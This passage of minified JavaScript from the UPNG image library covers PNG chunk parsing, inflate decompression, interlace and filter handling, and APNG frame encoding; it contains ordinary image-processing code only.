S=ie.tabs.PLTE,O=ie.tabs.tRNS,U=O?O.length:0;if(1==E)for(var K=0;K<de;K++){var ee=K*ae,se=K*we;for(_=0;_<we;_++){var ve=3*(le=Pe[ee+(_>>3)]>>7-((7&_)<<0)&1);I[x=se+_<<2]=S[ve],I[x+1]=S[ve+1],I[x+2]=S[ve+2],I[x+3]=le<U?O[le]:255}}if(2==E)for(K=0;K<de;K++)for(ee=K*ae,se=K*we,_=0;_<we;_++)ve=3*(le=Pe[ee+(_>>2)]>>6-((3&_)<<1)&3),I[x=se+_<<2]=S[ve],I[x+1]=S[ve+1],I[x+2]=S[ve+2],I[x+3]=le<U?O[le]:255;if(4==E)for(K=0;K<de;K++)for(ee=K*ae,se=K*we,_=0;_<we;_++)ve=3*(le=Pe[ee+(_>>1)]>>4-((1&_)<<2)&15),I[x=se+_<<2]=S[ve],I[x+1]=S[ve+1],I[x+2]=S[ve+2],I[x+3]=le<U?O[le]:255;if(8==E)for(_=0;_<j;_++){var le;ve=3*(le=Pe[_]),I[x=_<<2]=S[ve],I[x+1]=S[ve+1],I[x+2]=S[ve+2],I[x+3]=le<U?O[le]:255}}else if(4==F){if(8==E)for(_=0;_<j;_++){var ye=Pe[z=_<<1];I[x=_<<2]=ye,I[x+1]=ye,I[x+2]=ye,I[x+3]=Pe[z+1]}if(16==E)for(_=0;_<j;_++){var z;ye=Pe[z=_<<2],I[x=_<<2]=ye,I[x+1]=ye,I[x+2]=ye,I[x+3]=Pe[z+2]}}else if(0==F)for(p=ie.tabs.tRNS?ie.tabs.tRNS:-1,K=0;K<de;K++){var l=K*ae,f=K*we;if(1==E)for(var A=0;A<we;A++){var v=(ye=255*(Pe[l+(A>>>3)]>>>7-(7&A)&1))==255*p?0:255;Q[f+A]=v<<24|ye<<16|ye<<8|ye}else if(2==E)for(A=0;A<we;A++)v=(ye=85*(Pe[l+(A>>>2)]>>>6-((3&A)<<1)&3))==85*p?0:255,Q[f+A]=v<<24|ye<<16|ye<<8|ye;else if(4==E)for(A=0;A<we;A++)v=(ye=17*(Pe[l+(A>>>1)]>>>4-((1&A)<<2)&15))==17*p?0:255,Q[f+A]=v<<24|ye<<16|ye<<8|ye;else if(8==E)for(A=0;A<we;A++)v=(ye=Pe[l+A])==p?0:255,Q[f+A]=v<<24|ye<<16|ye<<8|ye;else if(16==E)for(A=0;A<we;A++)ye=Pe[l+(A<<1)],v=g(Pe,l+(A<<_))==p?0:255,Q[f+A]=v<<24|ye<<16|ye<<8|ye}return I},UPNG.decode=function(Pe){for(var we,de=new Uint8Array(Pe),ie=8,j=UPNG._bin,$=j.readUshort,ae=j.readUint,I={tabs:{},frames:[]},Q=new Uint8Array(de.length),F=0,E=0,g=[137,80,78,71,13,10,26,10],b=0;b<8;b++)if(de[b]!=g[b])throw"The input is not a PNG file!";for(;ie<de.length;){var _=j.readUint(de,ie),y=j.readASCII(de,ie+=4,4);if(ie+=4,"IHDR"==y)UPNG.decode._IHDR(de,ie,I);else if("CgBI"==y)I.tabs[y]=de.slice(ie,ie+4);else if("IDAT"==y){for(b=0;b<_;b++)Q[F+b]=de[ie+b];F+=_}else if("acTL"==y)I.tabs[y]={num_frames:ae(de,ie),num_plays:ae(de,ie+4)},we=new Uint8Array(de.length);else if("fcTL"==y){var M;0!=E&&((M=I.frames[I.frames.length-1]).data=UPNG.decode._decompress(I,we.slice(0,E),M.rect.width,M.rect.height),E=0);var p={x:ae(de,ie+12),y:ae(de,ie+16),width:ae(de,ie+4),height:ae(de,ie+8)},D=$(de,ie+22);D=$(de,ie+20)/(0==D?100:D);var w={rect:p,delay:Math.round(1e3*D),dispose:de[ie+24],blend:de[ie+25]};I.frames.push(w)}else if("fdAT"==y){for(b=0;b<_-4;b++)we[E+b]=de[ie+b+4];E+=_-4}else if("pHYs"==y)I.tabs[y]=[j.readUint(de,ie),j.readUint(de,ie+4),de[ie+8]];else if("cHRM"==y)for(I.tabs[y]=[],b=0;b<8;b++)I.tabs[y].push(j.readUint(de,ie+4*b));else if("tEXt"==y||"zTXt"==y){null==I.tabs[y]&&(I.tabs[y]={});var x=j.nextZero(de,ie),S=j.readASCII(de,ie,x-ie),O=ie+_-x-1;if("tEXt"==y)ee=j.readASCII(de,x+1,O);else{var U=UPNG.decode._inflate(de.slice(x+2,x+2+O));ee=j.readUTF8(U,0,U.length)}I.tabs[y][S]=ee}else if("iTXt"==y){null==I.tabs[y]&&(I.tabs[y]={}),x=0;var K=ie;x=j.nextZero(de,K),S=j.readASCII(de,K,x-K);var ee,se=de[K=x+1];x=j.nextZero(de,K+=2),j.readASCII(de,K,x-K),x=j.nextZero(de,K=x+1),j.readUTF8(de,K,x-K),O=_-((K=x+1)-ie),0==se?ee=j.readUTF8(de,K,O):(U=UPNG.decode._inflate(de.slice(K,K+O)),ee=j.readUTF8(U,0,U.length)),I.tabs[y][S]=ee}else if("PLTE"==y)I.tabs[y]=j.readBytes(de,ie,_);else if("hIST"==y){var ve=I.tabs.PLTE.length/3;for(I.tabs[y]=[],b=0;b<ve;b++)I.tabs[y].push($(de,ie+2*b))}else if("tRNS"==y)3==I.ctype?I.tabs[y]=j.readBytes(de,ie,_):0==I.ctype?I.tabs[y]=$(de,ie):2==I.ctype&&(I.tabs[y]=[$(de,ie),$(de,ie+2),$(de,ie+4)]);else if("gAMA"==y)I.tabs[y]=j.readUint(de,ie)/1e5;else if("sRGB"==y)I.tabs[y]=de[ie];else if("bKGD"==y)0==I.ctype||4==I.ctype?I.tabs[y]=[$(de,ie)]:2==I.ctype||6==I.ctype?I.tabs[y]=[$(de,ie),$(de,ie+2),$(de,ie+4)]:3==I.ctype&&(I.tabs[y]=de[ie]);else if("IEND"==y)break;j.readUint(de,ie+=_),ie+=4}return 0!=E&&((M=I.frames[I.frames.length-1]).data=UPNG.decode._decompress(I,we.slice(0,E),M.rect.width,M.rect.height),E=0),I.data=UPNG.decode._decompress(I,Q,I.width,I.height),delete I.compress,delete I.interlace,delete I.filter,I},UPNG.decode._decompress=function(Pe,we,de,ie){var j=UPNG.decode._getBPP(Pe),$=Math.ceil(de*j/8),ae=new Uint8Array(($+1+Pe.interlace)*ie);return we=Pe.tabs.CgBI?UPNG.inflateRaw(we,ae):UPNG.decode._inflate(we,ae),0==Pe.interlace?we=UPNG.decode._filterZero(we,Pe,0,de,ie):1==Pe.interlace&&(we=UPNG.decode._readInterlace(we,Pe)),we},UPNG.decode._inflate=function(Pe,we){return UPNG.inflateRaw(new Uint8Array(Pe.buffer,2,Pe.length-6),we)},UPNG.inflateRaw=(H={},H.H={},H.H.N=function(Pe,we){var de,ie,j=Uint8Array,$=0,ae=0,I=0,Q=0,F=0,E=0,g=0,b=0,_=0;if(3==Pe[0]&&0==Pe[1])return we||new j(0);var y=H.H,M=y.b,p=y.e,D=y.R,w=y.n,x=y.A,S=y.Z,O=y.m,U=null==we;for(U&&(we=new j(Pe.length>>>2<<5));0==$;)if($=M(Pe,_,1),ae=M(Pe,_+1,2),_+=3,0!=ae){if(U&&(we=H.H.W(we,b+(1<<17))),1==ae&&(de=O.J,ie=O.h,E=511,g=31),2==ae){I=p(Pe,_,5)+257,Q=p(Pe,_+5,5)+1,F=p(Pe,_+10,4)+4,_+=14;for(var K=1,ee=0;ee<38;ee+=2)O.Q[ee]=0,O.Q[ee+1]=0;for(ee=0;ee<F;ee++){var se=p(Pe,_+3*ee,3);O.Q[1+(O.X[ee]<<1)]=se,se>K&&(K=se)}_+=3*F,w(O.Q,K),x(O.Q,K,O.u),de=O.w,ie=O.d,_=D(O.u,(1<<K)-1,I+Q,Pe,_,O.v);var ve=y.V(O.v,0,I,O.C);E=(1<<ve)-1;var le=y.V(O.v,I,Q,O.D);g=(1<<le)-1,w(O.C,ve),x(O.C,ve,de),w(O.D,le),x(O.D,le,ie)}for(;;){var ye=de[S(Pe,_)&E];_+=15&ye;var z=ye>>>4;if(z>>>8==0)we[b++]=z;else{if(256==z)break;var l=b+z-254;if(z>264){var f=O.q[z-257];l=b+(f>>>3)+p(Pe,_,7&f),_+=7&f}var A=ie[S(Pe,_)&g],P=O.c[A>>>4],G=(P>>>4)+M(Pe,_+=15&A,15&P);for(_+=15&P;b<l;)we[b]=we[b++-G],we[b]=we[b++-G],we[b]=we[b++-G],we[b]=we[b++-G];b=l}}}else{0!=(7&_)&&(_+=8-(7&_));var X=4+(_>>>3),L=Pe[X-4]|Pe[X-3]<<8;U&&(we=H.H.W(we,b+L)),we.set(new j(Pe.buffer,Pe.byteOffset+X,L),b),_=X+L<<3,b+=L}return we.length==b?we:we.slice(0,b)},H.H.W=function(Pe,we){var de=Pe.length;if(we<=de)return Pe;var ie=new Uint8Array(de<<1);return ie.set(Pe,0),ie},H.H.R=function(Pe,we,de,ie,j,$){for(var ae=H.H.e,I=H.H.Z,Q=0;Q<de;){var F=Pe[I(ie,j)&we];j+=15&F;var E=F>>>4;if(E<=15)$[Q]=E,Q++;else{var g=0,b=0;16==E?(b=3+ae(ie,j,2),j+=2,g=$[Q-1]):17==E?(b=3+ae(ie,j,3),j+=3):18==E&&(b=11+ae(ie,j,7),j+=7);for(var _=Q+b;Q<_;)$[Q]=g,Q++}}return j},H.H.V=function(Pe,we,de,ie){for(var j=0,$=0,ae=ie.length>>>1;$<de;){var I=Pe[$+we];ie[$<<1]=0,ie[1+($<<1)]=I,I>j&&(j=I),$++}for(;$<ae;)ie[$<<1]=0,ie[1+($<<1)]=0,$++;return j},H.H.n=function(Pe,we){for(var de,ie,j,$,ae=H.H.m,I=Pe.length,Q=ae.j,F=0;F<=we;F++)Q[F]=0;for(F=1;F<I;F+=2)Q[Pe[F]]++;var E=ae.K;for(de=0,Q[0]=0,ie=1;ie<=we;ie++)E[ie]=de=de+Q[ie-1]<<1;for(j=0;j<I;j+=2)0!=($=Pe[j+1])&&(Pe[j]=E[$],E[$]++)},H.H.A=function(Pe,we,de){for(var ie=Pe.length,j=H.H.m.r,$=0;$<ie;$+=2)if(0!=Pe[$+1])for(var I=Pe[$+1],Q=$>>1<<4|I,F=we-I,E=Pe[$]<<F,g=E+(1<<F);E!=g;)de[j[E]>>>15-we]=Q,E++},H.H.l=function(Pe,we){for(var de=H.H.m.r,ie=15-we,j=0;j<Pe.length;j+=2)Pe[j]=de[Pe[j]<<we-Pe[j+1]]>>>ie},H.H.M=function(Pe,we,de){var ie=we>>>3;Pe[ie]|=de<<=7&we,Pe[ie+1]|=de>>>8},H.H.I=function(Pe,we,de){var ie=we>>>3;Pe[ie]|=de<<=7&we,Pe[ie+1]|=de>>>8,Pe[ie+2]|=de>>>16},H.H.e=function(Pe,we,de){return(Pe[we>>>3]|Pe[1+(we>>>3)]<<8)>>>(7&we)&(1<<de)-1},H.H.b=function(Pe,we,de){return(Pe[we>>>3]|Pe[1+(we>>>3)]<<8|Pe[2+(we>>>3)]<<16)>>>(7&we)&(1<<de)-1},H.H.Z=function(Pe,we){return(Pe[we>>>3]|Pe[1+(we>>>3)]<<8|Pe[2+(we>>>3)]<<16)>>>(7&we)},H.H.i=function(Pe,we){return(Pe[we>>>3]|Pe[1+(we>>>3)]<<8|Pe[2+(we>>>3)]<<16|Pe[3+(we>>>3)]<<24)>>>(7&we)},H.H.m=(N=Uint16Array,W=Uint32Array,{K:new N(16),j:new N(16),X:[16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15],S:[3,4,5,6,7,8,9,10,11,13,15,17,19,23,27,31,35,43,51,59,67,83,99,115,131,163,195,227,258,999,999,999],T:[0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0,0,0,0],q:new N(32),p:[1,2,3,4,5,7,9,13,17,25,33,49,65,97,129,193,257,385,513,769,1025,1537,2049,3073,4097,6145,8193,12289,16385,24577,65535,65535],z:[0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13,0,0],c:new W(32),J:new N(512),_:[],h:new N(32),$:[],w:new N(32768),C:[],v:[],d:new N(32768),D:[],u:new N(512),Q:[],r:new N(32768),s:new W(286),Y:new W(30),a:new W(19),t:new W(15e3),k:new N(65536),g:new N(32768)}),function(){for(var Pe=H.H.m,we=0;we<32768;we++){var de=we;de=(4278255360&(de=(4042322160&(de=(3435973836&(de=(2863311530&de)>>>1|(1431655765&de)<<1))>>>2|(858993459&de)<<2))>>>4|(252645135&de)<<4))>>>8|(16711935&de)<<8,Pe.r[we]=(de>>>16|de<<16)>>>17}function ie(j,$,ae){for(;0!=$--;)j.push(0,ae)}for(we=0;we<32;we++)Pe.q[we]=Pe.S[we]<<3|Pe.T[we],Pe.c[we]=Pe.p[we]<<4|Pe.z[we];ie(Pe._,144,8),ie(Pe._,112,9),ie(Pe._,24,7),ie(Pe._,8,8),H.H.n(Pe._,9),H.H.A(Pe._,9,Pe.J),H.H.l(Pe._,9),ie(Pe.$,32,5),H.H.n(Pe.$,5),H.H.A(Pe.$,5,Pe.h),H.H.l(Pe.$,5),ie(Pe.Q,19,0),ie(Pe.C,286,0),ie(Pe.D,30,0),ie(Pe.v,320,0)}(),H.H.N),UPNG.decode._readInterlace=function(Pe,we){for(var de=we.width,ie=we.height,j=UPNG.decode._getBPP(we),$=j>>3,ae=Math.ceil(de*j/8),I=new Uint8Array(ie*ae),Q=0,F=[0,0,4,0,2,0,1],E=[0,4,0,2,0,1,0],g=[8,8,8,4,4,2,2],b=[8,8,4,4,2,2,1],_=0;_<7;){for(var y=g[_],M=b[_],p=0,D=0,w=F[_];w<ie;)w+=y,D++;for(var x=E[_];x<de;)x+=M,p++;var S=Math.ceil(p*j/8);UPNG.decode._filterZero(Pe,we,Q,p,D);for(var O=0,U=F[_];U<ie;){for(var K=E[_],ee=Q+O*S<<3;K<de;){var se;if(1==j&&(se=(se=Pe[ee>>3])>>7-(7&ee)&1,I[U*ae+(K>>3)]|=se<<7-((7&K)<<0)),2==j&&(se=(se=Pe[ee>>3])>>6-(7&ee)&3,I[U*ae+(K>>2)]|=se<<6-((3&K)<<1)),4==j&&(se=(se=Pe[ee>>3])>>4-(7&ee)&15,I[U*ae+(K>>1)]|=se<<4-((1&K)<<2)),j>=8)for(var ve=U*ae+K*$,le=0;le<$;le++)I[ve+le]=Pe[(ee>>3)+le];ee+=j,K+=M}O++,U+=y}p*D!=0&&(Q+=D*(1+S)),_+=1}return I},UPNG.decode._getBPP=function(Pe){return[1,null,3,1,2,null,4][Pe.ctype]*Pe.depth},UPNG.decode._filterZero=function(Pe,we,de,ie,j){var $=UPNG.decode._getBPP(we),ae=Math.ceil(ie*$/8),I=UPNG.decode._paeth;$=Math.ceil($/8);var Q=0,F=1,E=Pe[de],g=0;if(E>1&&(Pe[de]=[0,0,1][E-2]),3==E)for(g=$;g<ae;g++)Pe[g+1]=Pe[g+1]+(Pe[g+1-$]>>>1)&255;for(var b=0;b<j;b++)if(g=0,0==(E=Pe[(F=(Q=de+b*ae)+b+1)-1]))for(;g<ae;g++)Pe[Q+g]=Pe[F+g];else if(1==E){for(;g<$;g++)Pe[Q+g]=Pe[F+g];for(;g<ae;g++)Pe[Q+g]=Pe[F+g]+Pe[Q+g-$]}else if(2==E)for(;g<ae;g++)Pe[Q+g]=Pe[F+g]+Pe[Q+g-ae];else if(3==E){for(;g<$;g++)Pe[Q+g]=Pe[F+g]+(Pe[Q+g-ae]>>>1);for(;g<ae;g++)Pe[Q+g]=Pe[F+g]+(Pe[Q+g-ae]+Pe[Q+g-$]>>>1)}else{for(;g<$;g++)Pe[Q+g]=Pe[F+g]+I(0,Pe[Q+g-ae],0);for(;g<ae;g++)Pe[Q+g]=Pe[F+g]+I(Pe[Q+g-$],Pe[Q+g-ae],Pe[Q+g-$-ae])}return Pe},UPNG.decode._paeth=function(Pe,we,de){var ie=Pe+we-de,j=ie-Pe,$=ie-we,ae=ie-de;return j*j<=$*$&&j*j<=ae*ae?Pe:$*$<=ae*ae?we:de},UPNG.decode._IHDR=function(Pe,we,de){var ie=UPNG._bin;de.width=ie.readUint(Pe,we),de.height=ie.readUint(Pe,we+=4),de.depth=Pe[we+=4],we++,de.ctype=Pe[we],we++,de.compress=Pe[we],we++,de.filter=Pe[we],we++,de.interlace=Pe[we],we++},UPNG._bin={nextZero:function(we,de){for(;0!=we[de];)de++;return de},readUshort:function(we,de){return we[de]<<8|we[de+1]},writeUshort:function(we,de,ie){we[de]=ie>>8&255,we[de+1]=255&ie},readUint:function(we,de){return 16777216*we[de]+(we[de+1]<<16|we[de+2]<<8|we[de+3])},writeUint:function(we,de,ie){we[de]=ie>>24&255,we[de+1]=ie>>16&255,we[de+2]=ie>>8&255,we[de+3]=255&ie},readASCII:function(we,de,ie){for(var j="",$=0;$<ie;$++)j+=String.fromCharCode(we[de+$]);return j},writeASCII:function(we,de,ie){for(var j=0;j<ie.length;j++)we[de+j]=ie.charCodeAt(j)},readBytes:function(we,de,ie){for(var j=[],$=0;$<ie;$++)j.push(we[de+$]);return j},pad:function(we){return we.length<2?"0".concat(we):we},readUTF8:function(we,de,ie){for(var j,$="",ae=0;ae<ie;ae++)$+="%".concat(UPNG._bin.pad(we[de+ae].toString(16)));try{j=decodeURIComponent($)}catch(I){return UPNG._bin.readASCII(we,de,ie)}return j}},UPNG._copyTile=function(Pe,we,de,ie,j,$,ae,I,Q){for(var F=Math.min(we,j),E=Math.min(de,$),g=0,b=0,_=0;_<E;_++)for(var y=0;y<F;y++)if(ae>=0&&I>=0?(g=_*we+y<<2,b=(I+_)*j+ae+y<<2):(g=(-I+_)*we-ae+y<<2,b=_*j+y<<2),0==Q)ie[b]=Pe[g],ie[b+1]=Pe[g+1],ie[b+2]=Pe[g+2],ie[b+3]=Pe[g+3];else if(1==Q){var M=.00392156862745098*Pe[g+3],p=Pe[g]*M,D=Pe[g+1]*M,w=Pe[g+2]*M,x=ie[b+3]*(1/255),S=ie[b]*x,O=ie[b+1]*x,U=ie[b+2]*x,K=1-M,ee=M+x*K,se=0==ee?0:1/ee;ie[b+3]=255*ee,ie[b+0]=(p+S*K)*se,ie[b+1]=(D+O*K)*se,ie[b+2]=(w+U*K)*se}else if(2==Q)p=Pe[g],D=Pe[g+1],w=Pe[g+2],S=ie[b],O=ie[b+1],U=ie[b+2],(M=Pe[g+3])==(x=ie[b+3])&&p==S&&D==O&&w==U?(ie[b]=0,ie[b+1]=0,ie[b+2]=0,ie[b+3]=0):(ie[b]=p,ie[b+1]=D,ie[b+2]=w,ie[b+3]=M);else if(3==Q){if(p=Pe[g],D=Pe[g+1],w=Pe[g+2],S=ie[b],O=ie[b+1],U=ie[b+2],(M=Pe[g+3])==(x=ie[b+3])&&p==S&&D==O&&w==U)continue;if(M<220&&x>20)return!1}return!0},UPNG.encode=function(Pe,we,de,ie,j,$,ae){null==ie&&(ie=0),null==ae&&(ae=!1);var I=UPNG.encode.compress(Pe,we,de,ie,[!1,!1,!1,0,ae]);return UPNG.encode.compressPNG(I,-1),UPNG.encode._main(I,we,de,j,$)},UPNG.encodeLL=function(Pe,we,de,ie,j,$,ae,I){for(var Q={ctype:0+(1==ie?0:2)+(0==j?0:4),depth:$,frames:[]},F=(ie+j)*$,E=F*we,g=0;g<Pe.length;g++)Q.frames.push({rect:{x:0,y:0,width:we,height:de},img:new Uint8Array(Pe[g]),blend:0,dispose:1,bpp:Math.ceil(F/8),bpl:Math.ceil(E/8)});return UPNG.encode.compressPNG(Q,0,!0),UPNG.encode._main(Q,we,de,ae,I)},UPNG.encode._main=function(Pe,we,de,ie,j){null==j&&(j={});var $=UPNG.crc.crc,ae=UPNG._bin.writeUint,I=UPNG._bin.writeUshort,Q=UPNG._bin.writeASCII,F=8,E=Pe.frames.length>1,g=!1,b=33+(E?20:0);if(null!=j.sRGB&&(b+=13),null!=j.pHYs&&(b+=21),3==Pe.ctype){for(var _=Pe.plte.length,y=0;y<_;y++)Pe.plte[y]>>>24!=255&&(g=!0);b+=8+3*_+4+(g?8+1*_+4:0)}for(var M=0;M<Pe.frames.length;M++)E&&(b+=38),b+=(ee=Pe.frames[M]).cimg.length+12,0!=M&&(b+=4);b+=12;var p=new Uint8Array(b),D=[137,80,78,71,13,10,26,10];for(y=0;y<8;y++)p[y]=D[y];if(ae(p,F,13),Q(p,F+=4,"IHDR"),ae(p,F+=4,we),ae(p,F+=4,de),p[F+=4]=Pe.depth,p[++F]=Pe.ctype,p[++F]=0,p[++F]=0,p[++F]=0,ae(p,++F,$(p,F-17,17)),F+=4,null!=j.sRGB&&(ae(p,F,1),Q(p,F+=4,"sRGB"),p[F+=4]=j.sRGB,ae(p,++F,$(p,F-5,5)),F+=4),null!=j.pHYs&&(ae(p,F,9),Q(p,F+=4,"pHYs"),ae(p,F+=4,j.pHYs[0]),ae(p,F+=4,j.pHYs[1]),p[F+=4]=j.pHYs[2],ae(p,++F,$(p,F-13,13)),F+=4),E&&(ae(p,F,8),Q(p,F+=4,"acTL"),ae(p,F+=4,Pe.frames.length),ae(p,F+=4,null!=j.loop?j.loop:0),ae(p,F+=4,$(p,F-12,12)),F+=4),3==Pe.ctype){for(ae(p,F,3*(_=Pe.plte.length)),Q(p,F+=4,"PLTE"),F+=4,y=0;y<_;y++){var w=3*y,x=Pe.plte[y],O=x>>>8&255,U=x>>>16&255;p[F+w+0]=255&x,p[F+w+1]=O,p[F+w+2]=U}if(ae(p,F+=3*_,$(p,F-3*_-4,3*_+4)),F+=4,g){for(ae(p,F,_),Q(p,F+=4,"tRNS"),F+=4,y=0;y<_;y++)p[F+y]=Pe.plte[y]>>>24&255;ae(p,F+=_,$(p,F-_-4,_+4)),F+=4}}var K=0;for(M=0;M<Pe.frames.length;M++){var ee=Pe.frames[M];E&&(ae(p,F,26),Q(p,F+=4,"fcTL"),ae(p,F+=4,K++),ae(p,F+=4,ee.rect.width),ae(p,F+=4,ee.rect.height),ae(p,F+=4,ee.rect.x),ae(p,F+=4,ee.rect.y),I(p,F+=4,ie[M]),I(p,F+=2,1e3),p[F+=2]=ee.dispose,p[++F]=ee.blend,ae(p,++F,$(p,F-30,30)),F+=4);var se=ee.cimg;ae(p,F,(_=se.length)+(0==M?0:4));var ve=F+=4;Q(p,F,0==M?"IDAT":"fdAT"),F+=4,0!=M&&(ae(p,F,K++),F+=4),p.set(se,F),ae(p,F+=_,$(p,ve,F-ve)),F+=4}return ae(p,F,0),Q(p,F+=4,"IEND"),ae(p,F+=4,$(p,F-4,4)),F+=4,p.buffer},UPNG.encode.compressPNG=function(Pe,we,de){for(var ie=0;ie<Pe.frames.length;ie++){var j=Pe.frames[ie],$=j.rect.height,ae=new Uint8Array($*j.bpl+$);j.cimg=UPNG.encode._filterZero(j.img,$,j.bpp,j.bpl,ae,we,de)}},UPNG.encode.compress=function(Pe,we,de,ie,j){for(var $=j[0],ae=j[1],I=j[2],Q=j[3],F=j[4],E=6,g=8,b=255,_=0;_<Pe.length;_++)for(var y=new Uint8Array(Pe[_]),M=y.length,p=0;p<M;p+=4)b&=y[p+3];var D=255!=b,w=UPNG.encode.framize(Pe,we,de,$,ae,I),x={},S=[],O=[];if(0!=ie){var U=[];for(p=0;p<w.length;p++)U.push(w[p].img.buffer);var K=UPNG.encode.concatRGBA(U),ee=UPNG.quantize(K,ie),se=0,ve=new Uint8Array(ee.abuf);for(p=0;p<w.length;p++){var le=(Ue=w[p].img).length;for(O.push(new Uint8Array(ee.inds.buffer,se>>2,le>>2)),_=0;_<le;_+=4)Ue[_]=ve[se+_],Ue[_+1]=ve[se+_+1],Ue[_+2]=ve[se+_+2],Ue[_+3]=ve[se+_+3];se+=le}for(p=0;p<ee.plte.length;p++)S.push(ee.plte[p].est.rgba)}else for(_=0;_<w.length;_++){var ye=w[_],z=new Uint32Array(ye.img.buffer),l=ye.rect.width,f=(M=z.length,new Uint8Array(M));for(O.push(f),p=0;p<M;p++){var A=z[p];if(0!=p&&A==z[p-1])f[p]=f[p-1];else if(p>l&&A==z[p-l])f[p]=f[p-l];else{var v=x[A];if(null==v&&(x[A]=v=S.length,S.push(A),S.length>=300))break;f[p]=v}}}var P=S.length;for(P<=256&&0==F&&(g=P<=2?1:P<=4?2:P<=16?4:8,g=Math.max(g,Q)),_=0;_<w.length;_++){l=(ye=w[_]).rect.width;var G=ye.rect.height,X=ye.img;new Uint32Array(X.buffer);var L=4*l,h=4;if(P<=256&&0==F){L=Math.ceil(g*l/8);for(var R=new Uint8Array(L*G),J=O[_],Z=0;Z<G;Z++){p=Z*L;var ue=Z*l;if(8==g)for(var Ie=0;Ie<l;Ie++)R[p+Ie]=J[ue+Ie];else if(4==g)for(Ie=0;Ie<l;Ie++)R[p+(Ie>>1)]|=J[ue+Ie]<<4-4*(1&Ie);else if(2==g)for(Ie=0;Ie<l;Ie++)R[p+(Ie>>2)]|=J[ue+Ie]<<6-2*(3&Ie);else if(1==g)for(Ie=0;Ie<l;Ie++)R[p+(Ie>>3)]|=J[ue+Ie]<<7-1*(7&Ie)}X=R,E=3,h=1}else if(0==D&&1==w.length){R=new Uint8Array(l*G*3);var Ae=l*G;for(p=0;p<Ae;p++){var Ue,Xe=4*p;R[Ue=3*p]=X[Xe],R[Ue+1]=X[Xe+1],R[Ue+2]=X[Xe+2]}X=R,E=2,h=3,L=3*l}ye.img=X,ye.bpl=L,ye.bpp=h}return{ctype:E,depth:g,plte:S,frames:w}},UPNG.encode.framize=function(Pe,we,de,ie,j,$){for(var ae=[],I=0;I<Pe.length;I++){var Q,F=new Uint8Array(Pe[I]),E=new Uint32Array(F.buffer),g=0,b=0,_=we,y=de,M=ie?1:0;if(0!=I){for(var p=$||ie||1==I||0!=ae[I-2].dispose?1:2,D=0,w=1e9,x=0;x<p;x++){for(var S=new Uint8Array(Pe[I-1-x]),O=new Uint32Array(Pe[I-1-x]),U=we,K=de,ee=-1,se=-1,ve=0;ve<de;ve++)for(var le=0;le<we;le++)E[P=ve*we+le]!=O[P]&&(le<U&&(U=le),le>ee&&(ee=le),ve<K&&(K=ve),ve>se&&(se=ve));-1==ee&&(U=K=ee=se=0),j&&(1==(1&U)&&U--,1==(1&K)&&K--);var ye=(ee-U+1)*(se-K+1);ye<w&&(w=ye,D=x,g=U,b=K,_=ee-U+1,y=se-K+1)}S=new Uint8Array(Pe[I-1-D]),1==D&&(ae[I-1].dispose=2),Q=new Uint8Array(_*y*4),UPNG._copyTile(S,we,de,Q,_,y,-g,-b,0),1==(M=UPNG._copyTile(F,we,de,Q,_,y,-g,-b,3)?1:0)?UPNG.encode._prepareDiff(F,we,de,Q,{x:g,y:b,width:_,height:y}):UPNG._copyTile(F,we,de,Q,_,y,-g,-b,0)}else Q=F.slice(0);ae.push({rect:{x:g,y:b,width:_,height:y},img:Q,blend:M,dispose:0})}if(ie)for(I=0;I<ae.length;I++)if(1!=(G=ae[I]).blend){var z=G.rect,l=ae[I-1].rect,f=Math.min(z.x,l.x),A=Math.min(z.y,l.y),v={x:f,y:A,width:Math.max(z.x+z.width,l.x+l.width)-f,height:Math.max(z.y+z.height,l.y+l.height)-A};ae[I-1].dispose=1,I-1!=0&&UPNG.encode._updateFrame(Pe,we,de,ae,I-1,v,j),UPNG.encode._updateFrame(Pe,we,de,ae,I,v,j)}if(1!=Pe.length)for(var P=0;P<ae.length;P++){var G;G=ae[P]}return ae},UPNG.encode._updateFrame=function(Pe,we,de,ie,j,$,ae){for(var I=Uint8Array,Q=Uint32Array,F=new I(Pe[j-1]),E=new Q(Pe[j-1]),g=j+1<Pe.length?new I(Pe[j+1]):null,b=new I(Pe[j]),_=new Q(b.buffer),y=we,M=de,p=-1,D=-1,w=0;w<$.height;w++)for(var x=0;x<$.width;x++){var S=$.x+x,O=$.y+w,U=O*we+S,K=_[U];0==K||0==ie[j-1].dispose&&E[U]==K&&(null==g||0!=g[4*U+3])||(S<y&&(y=S),S>p&&(p=S),O<M&&(M=O),O>D&&(D=O))}-1==p&&(y=M=p=D=0),ae&&(1==(1&y)&&y--,1==(1&M)&&M--);var ee=ie[j];ee.rect=$={x:y,y:M,width:p-y+1,height:D-M+1},ee.blend=1,ee.img=new Uint8Array($.width*$.height*4),0==ie[j-1].dispose?(UPNG._copyTile(F,we,de,ee.img,$.width,$.height,-$.x,-$.y,0),UPNG.encode._prepareDiff(b,we,de,ee.img,$)):UPNG._copyTile(b,we,de,ee.img,$.width,$.height,-$.x,-$.y,0)},UPNG.encode._prepareDiff=function(Pe,we,de,ie,j){UPNG._copyTile(Pe,we,de,ie,j.width,j.height,-j.x,-j.y,2)},UPNG.encode._filterZero=function(Pe,we,de,ie,j,$,ae){var I,Q=[],F=[0,1,2,3,4];-1!=$?F=[$]:(we*ie>5e5||1==de)&&(F=[0]),ae&&(I={level:0});for(var E,g=UZIP,b=0;b<F.length;b++){for(var _=0;_<we;_++)UPNG.encode._filterLine(j,Pe,_,ie,de,F[b]);Q.push(g.deflate(j,I))}var y=1e9;for(b=0;b<Q.length;b++)Q[b].length<y&&(E=b,y=Q[b].length);return Q[E]},UPNG.encode._filterLine=function(Pe,we,de,ie,j,$){var ae=de*ie,I=ae+de,Q=UPNG.decode._paeth;if(Pe[I]=$,I++,0==$)if(ie<500)for(var F=0;F<ie;F++)Pe[I+F]=we[ae+F];else Pe.set(new Uint8Array(we.buffer,ae,ie),I);else if(1==$){for(F=0;F<j;F++)Pe[I+F]=we[ae+F];for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]-we[ae+F-j]+256&255}else 